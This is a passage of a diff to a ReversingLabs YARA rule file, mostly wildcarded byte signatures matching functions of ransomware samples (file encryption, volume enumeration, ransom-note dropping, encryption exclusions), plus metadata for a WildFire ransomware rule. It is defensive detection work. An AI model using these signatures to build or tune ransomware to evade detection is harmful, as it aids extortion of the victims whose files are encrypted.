+            4C 8D 0D ?? ?? ?? ?? 45 8D 46 ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 44 38 74
+            24 ?? 74 ?? 48 8B 4C 24
+        }
+		$find_system_volumes_v1_p1 = {
+            48 89 4C 24 ?? 55 53 56 57 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ??
+            48 8B F1 45 33 FF 44 89 7C 24 ?? 4C 89 39 4C 89 79 ?? 4C 89 79 ?? C7 44 24 ?? ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 0F 1F 00 4C 8D 8D ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 44 89 7C 24 ?? 4C 89 7C 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24
+            ?? 4C 89 7C 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 14 00 48 8D BD ?? ?? ?? ?? 48 03 FA 4C 89 7C 24 ?? 4C 89
+            7C 24 ?? 4C 89 7C 24 ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48
+            8D 9D ?? ?? ?? ?? 48 D1 FA 48 83 FA ?? 72 ?? 45 33 C0 48 8D 4C 24 ?? E8
+        }
+		$find_system_volumes_v1_p2 = {
+            4C 89 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 3B C7 74
+            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 44 0F B6 0B 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 3B
+            CA 73 ?? 48 8D 41 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 83 FA ?? 48 0F 43 44 24 ?? 44
+            88 0C 08 C6 44 08 ?? ?? EB ?? 45 33 C0 41 8D 50 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48
+            83 C3 ?? 48 3B DF 75 ?? 4C 89 BD ?? ?? ?? ?? 48 8B 46 ?? 48 3B 46 ?? 74 ?? 4C 89 38
+            4C 89 78 ?? 4C 89 78 ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 4C
+            89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 44
+            24 ?? 48 8B D0 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 FF C2
+            48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1
+            48 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 48 8B C6 48 81 C4
+        }
+		$set_default_icon_p1 = {
+            48 89 5C 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ??
+            48 8B F1 45 33 ED 44 89 6C 24 ?? 4C 8B 35 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 4C 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B C8 49 2B CE 49 3B CF 0F 82 ?? ??
+            ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 4C 0F 43 25 ?? ?? ?? ?? 4C 89 6C
+            24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 4B 8D 2C 37 BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 3B
+            EB 0F 86 ?? ?? ?? ?? 48 8B DD 48 83 CB ?? 48 3B D8 76 ?? 48 8B D8 48 B8 ?? ?? ?? ??
+            ?? ?? ?? ?? 48 8D 0C 00 EB ?? B8 ?? ?? ?? ?? 48 3B D8 48 0F 42 D8 48 8D 4B ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 3B C8 0F 87 ?? ?? ?? ?? 48 03 C9 48 81 F9 ?? ?? ?? ?? 72
+            ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ??
+            ?? ?? ?? 48 8D 78 ?? 48 83 E7 ?? 48 89 47 ?? EB ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48
+            8B F8 EB ?? 49 8B FD 48 89 7C 24 ?? 48 89 6C 24 ?? 48 89 5C 24 ?? 4B 8D 1C 36 4C 8B
+        }
+		$set_default_icon_p2 = {
+            C3 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 48 8D 0C 3B 4F 8D 04 3F 48 8D 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 66 44 89 2C 6F BB ?? ?? ?? ?? 89 5C 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ??
+            ?? 48 0F 43 54 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ??
+            48 89 44 24 ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 45 33 C9 45 33
+            C0 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CE 48 83 7E ?? ?? 72 ??
+            48 8B 0E 8B 46 ?? 03 C0 89 44 24 ?? 48 89 4C 24 ?? 44 8B CB 45 33 C0 48 8D 15 ?? ??
+            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 B9 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? EB ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24
+            ?? 45 33 C9 44 8B C0 33 D2 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E3 ?? 89 5C 24 ?? 48
+            8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B C1 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 77 ??
+            E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 44 89 6C 24 ?? 48 8B CE
+            E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C
+            5F 5E 5D C3
+        }
+		$cmd_prompt = {
+            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8B EC 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
+            48 89 45 ?? 48 8B D9 4C 8D 05 ?? ?? ?? ?? 33 FF 48 8D 4D ?? 33 D2 48 89 7D ?? E8 ??
+            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8B 4D ?? 48 85 C9 0F 84 ?? ??
+            ?? ?? 33 D2 E8 ?? ?? ?? ?? 48 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 85 DB 40 0F 94 C7 E9 ??
+            ?? ?? ?? 48 8B 45 ?? 48 8D 0D ?? ?? ?? ?? 48 89 45 ?? 48 89 4D ?? 48 89 5D ?? 48 89
+            7D ?? 48 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 18 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 33 C9
+            89 38 48 8B 55 ?? E8 ?? ?? ?? ?? 48 8B F8 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? 89 18 EB ??
+            E8 ?? ?? ?? ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? 48 8B 4D ?? E8 ?? ?? ??
+            ?? 83 CF ?? EB ?? E8 ?? ?? ?? ?? 89 18 48 8D 15 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 48
+            89 55 ?? 33 C9 E8 ?? ?? ?? ?? 48 8B F8 48 8B 4D ?? E8 ?? ?? ?? ?? 8B C7 48 8B 4D ??
+            48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 5D C3
+        }
+		$exclude_from_encryption = {
+            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
+            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
+            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
+            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
+            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
+            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
+            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
+            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
+            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
+            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
+            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0
+        }
+		$encrypt_files_v1 = {
+            41 83 CC ?? 44 89 64 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FF ?? 48 0F 43 8C 24 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B F8 41 83 E4 ?? 44 89 64 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48
+            83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
+            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 49
+            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
+            ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 9C 24 ?? ?? 00 00 40 F6 C7 ?? 74
+            ?? 49 8B CF E8 ?? ?? ?? ?? 90 48 BE ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 4C
+            8D 35 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? C6 84
+            24 ?? ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B F0 48
+            89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 4C 8B 70 ?? 48
+            83 78 ?? ?? 72 ?? 48 8B 30 48 8D 8C 24 ?? ?? ?? ?? 49 83 FE ?? 73 ?? 41 B8 ?? ?? ??
+            ?? 48 8B D6 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? EB ?? 4C 89 AC 24 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 89 BC 24 ?? ?? ?? ?? 49 3B
+            FD 49 0F 47 FD 48 8D 57 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4E 8D 04 75 ?? ??
+            ?? ?? 48 8B D6 48 8B C8 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24
+        }
+		$find_system_volumes_v2 = {
+            BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 0F 1F 44 00 ?? 4C 8D 8D ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 89 74 24 ?? 48 89 74 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ??
+            48 89 74 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 4C 8D 04 00 48 8D 85 ?? ?? ?? ?? 49 03 C0 48 89 74 24 ?? 48 89 74
+            24 ?? 48 89 74 24 ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 48 8D
+            8D ?? ?? ?? ?? 48 3B C8 74 ?? 49 D1 F8 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 90 48 8B 43 ?? 48 3B 43 ?? 74 ?? 48 89 30 48 89 70 ?? 48 89 70 ?? 41 B8 ?? ??
+            ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? 66 89 74 24 ?? 48 83 43 ?? ?? EB ?? 4C 8D 44 24 ?? 48 8B D0 48 8B CB E8 ?? ?? ??
+            ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
+            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
+            ?? 77 ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 41
+            B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48
+            8B CF FF 15 ?? ?? ?? ?? 48 8B C3 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E
+            5D C3
+        }
+		$drop_ransom_note = {
+            48 83 3D ?? ?? ?? ?? ?? 48 0F 43 15 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 4D ?? E8
+            ?? ?? ?? ?? 48 8B D8 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 45 8D 46 ?? 48 8B D0 48 8D
+            4D ?? E8 ?? ?? ?? ?? 4C 89 73 ?? 48 C7 43 ?? ?? ?? ?? ?? 66 44 89 33 BE ?? ?? ?? ??
+            89 75 ?? 83 E6 ?? 89 75 ?? 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48
+            8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83
+            C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ??
+            ?? 66 44 89 75 ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 43 4D ?? 4C 89 74 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 48 8B D8 48 83 F8 ?? 74 ?? 4C 89 74 24 ?? 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ??
+            48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA
+            ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 75 ?? 48 8B 57
+            ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 0F 48 81 FA ?? ?? ?? ?? 72 ?? 48
+            83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ??
+            4C 89 77 ?? 48 C7 47 ?? ?? ?? ?? ?? 66 44 89 37 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ??
+            49 8B 73 ?? 49 8B 7B
+        }
+		$encrypt_files_v2_p1 = {
+            BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 48 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 49 8B FA 49 8B D1 4D 85 D2
+            74 ?? 4C 8B C1 4D 2B C1 0F B7 02 66 41 39 04 10 75 ?? 48 83 C2 ?? 48 83 EF ?? 75 ??
+            49 2B CB 48 D1 F9 E9 ?? ?? ?? ?? 48 83 C1 ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
+            8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ??
+            ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 0B 00 F3 0F 7F 45 ??
+            48 89 75 ?? 48 89 75 ?? 48 8D 45 ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ??
+            C6 45 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? 48 8D 45 ?? 83 E0 ?? 48 8D 44 05 ?? 48 89 45 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
+            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48
+            8D 05 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48
+            C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            8B E8 48 89 44 24 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49
+        }
+		$encrypt_files_v2_p2 = {
+            8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8D 0D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8B CF 41 B8 ?? ?? ?? ?? 49 8B D5
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D5 48 8B 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 83 C1 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 E8 ?? ?? ?? ??
+            BF ?? ?? ?? ?? 4C 3B FF 0F 8D ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8B FE 49 8B C7
+            48 2B C7 48 99 83 E2 ?? 48 03 C2 48 C1 F8 ?? 4C 8B F0 F2 0F 59 35 ?? ?? ?? ?? 0F 57
+            C0 F2 48 0F 2A C0 F2 0F 59 F0 F2 48 0F 2C CE 48 85 C9 0F 85 ?? ?? ?? ?? 4D 85 FF 0F
+            8E ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ??
+            90 48 8D 35 ?? ?? ?? ?? 48 89 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
+            ?? 4D 8B CF 45 33 C0 48 8B D3 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49
+            81 FF ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
+            ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48
+            8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8B CF 45 33 C0 48 8B D3 49 8B CE
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 99 48 F7 F9 4C 8B E8 48 85 C0 75 ?? 48 8D 45 ?? 48
+        }
+		$encrypt_files_v2_p3 = {
+            89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 35 ?? ?? ?? ?? 48 89
+            75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4D 8B CF 45 33 C0 48 8B D3
+            48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? E9 ?? ?? ?? ?? 4D 85 F6 0F 8E ??
+            ?? ?? ?? 4D 8B FD 49 C1 E7 ?? 4C 8B A5 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 44 24 ?? 48
+            8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05
+            ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8B C7 48 8B D3 49 8B
+            CC E8 ?? ?? ?? ?? 49 03 F5 49 03 FF 49 3B F6 7C ?? 4C 8B A5 ?? ?? ?? ?? 4C 8B 6C 24
+            ?? 48 8D 35 ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 4C 8B C3 48 8B 95
+            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 4D 8B C4
+            48 8D 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48
+            85 D2 74 ?? 48 8B FA 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B CA E8 ?? ?? ?? ?? 90 4D 85 ED
+            74 ?? 49 8B FD 33 C0 B9 ?? ?? ?? ?? F3 AA 49 8B CD E8 ?? ?? ?? ?? 90 48 89 74 24 ??
+            4C 89 74 24
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHAIKA, TOV" and ( pe.signatures [ i ] . serial == "00:c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" or pe.signatures [ i ] . serial == "c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" ) and 1551398400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( all of ( $find_system_volumes_v1_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $cmd_prompt ) and ( $exclude_from_encryption ) and ( $encrypt_files_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $find_system_volumes_v2 ) and ( $drop_ransom_note ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_23F537Ce13C6Cccdfd3F8Ce81Fb981Cb : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wildfire : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WildFire ransomware."
 		author = "ReversingLabs"
-		id = "f48b7818-5b34-5609-822a-39a2e7fb44c5"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0c44f017-703c-5db7-b777-62fcd181af9a"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3434-L3450"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.WildFire.yara#L1-L77"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d347bce3eddd0cac276a7504955f0342ae44fd93d238e514af5b1fdc208b68fc"
+		logic_hash = "d3be2eac7967853aae6e1317d9c22d95a3dc4b3e5bf8acbe97a7bbeabc9eab38"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WildFire"
